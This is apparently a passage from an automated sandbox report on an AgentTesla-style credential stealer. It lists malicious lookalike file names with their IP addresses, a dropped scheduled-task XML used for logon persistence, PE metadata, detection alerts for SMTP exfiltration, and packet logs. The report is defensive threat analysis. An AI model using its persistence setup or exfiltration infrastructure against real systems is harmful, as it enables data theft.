                                                  SecuriteInfo.com.Win32.CrypterX-gen.10947.8437.exeGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  http://xmas-art.ru/fo/ufmavtiwaehat-sejautfoja/haotwaep/376197/?T=44g47k0c-8q-1q1QZ44igflammatiojb&vfilclszdwwrqimq5-t-nsnba=contyasseursSZ6J2Get hashmaliciousBrowse
                                                  • 35.168.94.234
                                                  MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                  • 3.220.57.224
                                                  SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exeGet hashmaliciousBrowse
                                                  • 54.91.59.199
                                                  MEPS-42.exeGet hashmaliciousBrowse
                                                  • 3.220.57.224
                                                  ORDER.exeGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exeGet hashmaliciousBrowse
                                                  • 52.20.78.240
                                                  DHJ59300948.xlsGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  Quotation.exeGet hashmaliciousBrowse
                                                  • 3.220.57.224
                                                  Cg7vRuVKhI.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  PUBLIC-DOMAIN-REGISTRYUSSecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeGet hashmaliciousBrowse
                                                  • 111.118.212.38
                                                  http://url4483.sosadiazeventos.com/ls/click?upn=mXPGTXlLlQcgRVh-2F4Dp38fDRGJMmpWDEH-2FE76VgzzHi8nDM-2FDFm088Y0fZh2YEo3qbCf_fJCV5gLuaP5-2B7UCkl8vmUj8dC4C9Y4dg1tvjDkrKvY5UHarI7EGwbOBMpE-2F-2BTDbMTeAQqiCIplw1OEed2ml5geiDyCAjnFVFwD7rEXflsrU-2FDtPiBmvBUcn9oohKUiNRFALv-2B8n9tEJ8XP-2Bi8ehDveJ4shY6zR5k78j6VeP8An8lQFfJ6kmEWKqICZhGlO0fhkepKLO1yzpGTF9YmHbAGNDbmtf6HwQ7g1ug0zWgxA8-3DGet hashmaliciousBrowse
                                                  • 43.225.55.221
                                                  SHIPMENT DOCUMENTS.exeGet hashmaliciousBrowse
                                                  • 199.79.62.12
                                                  ORDER.exeGet hashmaliciousBrowse
                                                  • 199.79.62.12
                                                  Quotation.exeGet hashmaliciousBrowse
                                                  • 111.118.212.38
                                                  HBL & MBL.exeGet hashmaliciousBrowse
                                                  • 162.215.240.200
                                                  KWIR000714988.exeGet hashmaliciousBrowse
                                                  • 111.118.212.38
                                                  INV and NOA.exeGet hashmaliciousBrowse
                                                  • 199.79.62.12
                                                  ORDERFT-PO-0276-22 & PO pdf.exeGet hashmaliciousBrowse
                                                  • 208.91.199.223
                                                  payment receipt.exeGet hashmaliciousBrowse
                                                  • 162.215.240.200
                                                  CONTRACT #683793.exeGet hashmaliciousBrowse
                                                  • 199.79.62.12
                                                  SecuriteInfo.com.MSIL.GenKryptik.FYGA.tr.13096.12566.exeGet hashmaliciousBrowse
                                                  • 111.118.212.38
                                                  INV and NOA.exeGet hashmaliciousBrowse
                                                  • 199.79.62.12
                                                  SecuriteInfo.com.Win32.PWSX-gen.27054.5093.exeGet hashmaliciousBrowse
                                                  • 111.118.212.38
                                                  INV & Packing List.exeGet hashmaliciousBrowse
                                                  • 111.118.212.38
                                                  REMITTANCE COPY.exeGet hashmaliciousBrowse
                                                  • 199.79.62.12
                                                  LPO-17-006AD.jsGet hashmaliciousBrowse
                                                  • 208.91.199.225
                                                  PO N#U00b0CF004303.jsGet hashmaliciousBrowse
                                                  • 208.91.199.225
                                                  PI#102087.exeGet hashmaliciousBrowse
                                                  • 111.118.212.38
                                                  SecuriteInfo.com.Win32.PWSX-gen.30630.28537.exeGet hashmaliciousBrowse
                                                  • 199.79.62.12
                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  3b5074b1b5d032e5620f69f9f700ff0eSIEM_PO00938467648.vbsGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  SHIPMENT DOCUMENTS.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  file.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  SkyNet.1448.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  SkyNet.1448.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  solicitud de presupuesto 29-11-2022.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  library.dllGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  SecuriteInfo.com.Win32.CrypterX-gen.24912.15475.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  MEPS-42.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  11-29-22.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  ORDER.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  SecuriteInfo.com.Win32.CrypterX-gen.414.24926.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  Quotation.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  Ziraat-bankasiSwiftMessaji2911202245344.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  Cg7vRuVKhI.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  SecuriteInfo.com.Win32.PWSX-gen.7918.18477.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  SecuriteInfo.com.Win32.CrypterX-gen.12789.377.exeGet hashmaliciousBrowse
                                                  • 3.232.242.170
                                                  • 3.220.57.224
                                                  No context
                                                  Process:C:\Users\user\AppData\Roaming\IwUNvHNy.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.355304211458859
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1653
                                                  Entropy (8bit):5.16002706959876
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3htn:cbha7JlNQV/rydbz9I3YODOLNdq3p
                                                  MD5:F40F87D29A87D92FDBAF4AB9EA2AD62E
                                                  SHA1:2CC0B2D5242FF42D741D4BE9D1F531B28B7AC654
                                                  SHA-256:8339BEE9CD4844E7B0203BEDA7E523D14BD3CC2CF5A9FF120AB8B308CAD3F72E
                                                  SHA-512:4DF148E8BCEBA1230798FF861827F115EBF6884B2F7EB83C9B0705CA7B81BF12C8A9DA40C175190D91DC2792CC93868B935654187DDD4023EF23833DB961A1FD
                                                  Malicious:true
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail
                                                  Process:C:\Users\user\AppData\Roaming\IwUNvHNy.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1653
                                                  Entropy (8bit):5.16002706959876
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/S7h2ulNMFp2O/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB3htn:cbha7JlNQV/rydbz9I3YODOLNdq3p
                                                  MD5:F40F87D29A87D92FDBAF4AB9EA2AD62E
                                                  SHA1:2CC0B2D5242FF42D741D4BE9D1F531B28B7AC654
                                                  SHA-256:8339BEE9CD4844E7B0203BEDA7E523D14BD3CC2CF5A9FF120AB8B308CAD3F72E
                                                  SHA-512:4DF148E8BCEBA1230798FF861827F115EBF6884B2F7EB83C9B0705CA7B81BF12C8A9DA40C175190D91DC2792CC93868B935654187DDD4023EF23833DB961A1FD
                                                  Malicious:false
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvail
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):731648
                                                  Entropy (8bit):7.5267056901942135
                                                  Encrypted:false
                                                  SSDEEP:12288:EMFVoh7SJnnlJgcu34IjRN1T05AtGuFr5cE8LHWK:fFV7nAFrjn+5UAvL
                                                  MD5:65CF34490748F7924DB84DC043F5D81E
                                                  SHA1:1EA50942D4ACF0561BD6BCB3FE0195069EB5C259
                                                  SHA-256:96642679196D3F732718EEBF2E7970D7ECA03DDC4645B3F0292DB847ED82B24E
                                                  SHA-512:0366181FD6A174509B244521E01760116D664B15F0C61BA4DBE1D8C2B35FEBDCDF90836CD553361F0A972ACC1EE2477D3ADA30F9382DC2D895B12C3ACE80C55F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!..c..............P..............<... ...@....@.. ....................................@..................................;..O....@.......................`......L...T............................................ ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......(..............@..B.................;......H.......................................................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r3..p~....o-...(......t$....+..*...0..&........(....r_..p~....o-...(......
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.5267056901942135
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:SecuriteInfo.com.Win32.PWSX-gen.18868.10449.exe
                                                  File size:731648
                                                  MD5:65cf34490748f7924db84dc043f5d81e
                                                  SHA1:1ea50942d4acf0561bd6bcb3fe0195069eb5c259
                                                  SHA256:96642679196d3f732718eebf2e7970d7eca03ddc4645b3f0292db847ed82b24e
                                                  SHA512:0366181fd6a174509b244521e01760116d664b15f0c61ba4dbe1d8c2b35febdcdf90836cd553361f0a972acc1ee2477d3ada30f9382dc2d895b12c3ace80c55f
                                                  SSDEEP:12288:EMFVoh7SJnnlJgcu34IjRN1T05AtGuFr5cE8LHWK:fFV7nAFrjn+5UAvL
                                                  TLSH:7FF46B9132B18573F4DF4279541871CC2D7DB543BAD6E20B6B7B3A4086029BFF6A8E12
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!..c..............P..............<... ...@....@.. ....................................@................................
                                                  Icon Hash:00828e8e8686b000
                                                  Entrypoint:0x4b3c0a
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x63861F21 [Tue Nov 29 15:02:57 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb3bb60x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x608.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0xb184c0x54.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000xb1c100xb1e00False0.7931252196064652data7.533959618381255IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xb40000x6080x800False0.33349609375data3.4497386267724677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xb60000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountry
                                                  RT_VERSION0xb40900x378data
                                                  RT_MANIFEST0xb44180x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                  DLLImport
                                                  mscoree.dll_CorExeMain
                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  192.168.2.6111.118.212.38497235872030171 11/29/22-19:38:19.561263TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49723587192.168.2.6111.118.212.38
                                                  192.168.2.6111.118.212.38497185872030171 11/29/22-19:37:32.174046TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49718587192.168.2.6111.118.212.38
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 29, 2022 19:37:07.584291935 CET49713443192.168.2.63.220.57.224
                                                  Nov 29, 2022 19:37:07.584352016 CET443497133.220.57.224192.168.2.6
                                                  Nov 29, 2022 19:37:07.584460974 CET49713443192.168.2.63.220.57.224
                                                  Nov 29, 2022 19:37:07.676655054 CET49713443192.168.2.63.220.57.224
                                                  Nov 29, 2022 19:37:07.676713943 CET443497133.220.57.224192.168.2.6
                                                  Nov 29, 2022 19:37:07.981940985 CET443497133.220.57.224192.168.2.6
                                                  Nov 29, 2022 19:37:07.982059002 CET49713443192.168.2.63.220.57.224
                                                  Nov 29, 2022 19:37:07.986948967 CET49713443192.168.2.63.220.57.224
                                                  Nov 29, 2022 19:37:07.986968040 CET443497133.220.57.224192.168.2.6
                                                  Nov 29, 2022 19:37:07.987286091 CET443497133.220.57.224192.168.2.6
                                                  Nov 29, 2022 19:37:08.115922928 CET49713443192.168.2.63.220.57.224
                                                  Nov 29, 2022 19:37:09.107095003 CET49713443192.168.2.63.220.57.224
                                                  Nov 29, 2022 19:37:09.107141018 CET443497133.220.57.224192.168.2.6
                                                  Nov 29, 2022 19:37:09.254287958 CET443497133.220.57.224192.168.2.6
                                                  Nov 29, 2022 19:37:09.254414082 CET443497133.220.57.224192.168.2.6
                                                  Nov 29, 2022 19:37:09.254643917 CET49713443192.168.2.63.220.57.224
                                                  Nov 29, 2022 19:37:09.275145054 CET49713443192.168.2.63.220.57.224
                                                  Nov 29, 2022 19:37:27.280982018 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:27.559288979 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:27.559411049 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:28.572220087 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:28.572333097 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:29.863013029 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:29.869247913 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:30.148148060 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:30.150072098 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:30.429714918 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:30.430197001 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:30.751842976 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:31.260838985 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:31.261821985 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:31.541266918 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:31.541328907 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:31.541712999 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:31.860230923 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:31.893450022 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:31.893871069 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:32.172013044 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:32.172235012 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:32.174046040 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:32.174232006 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:32.174340963 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:32.174438953 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:32.454286098 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:32.454948902 CET58749718111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:37:32.508652925 CET49718587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:37:53.167459011 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 19:37:53.167522907 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 19:37:53.167608976 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 19:37:53.205972910 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 19:37:53.206012011 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 19:37:53.510446072 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 19:37:53.510565996 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 19:37:53.513940096 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 19:37:53.513962984 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 19:37:53.514383078 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 19:37:53.652631998 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 19:37:54.518997908 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 19:37:54.519059896 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 19:37:54.751689911 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 19:37:54.751791000 CET443497203.232.242.170192.168.2.6
                                                  Nov 29, 2022 19:37:54.752917051 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 19:37:54.754750013 CET49720443192.168.2.63.232.242.170
                                                  Nov 29, 2022 19:38:15.748650074 CET49723587192.168.2.6111.118.212.38
                                                  Nov 29, 2022 19:38:16.021739006 CET58749723111.118.212.38192.168.2.6
                                                  Nov 29, 2022 19:38:16.021903038 CET49723587192.168.2.6111.118.212.38
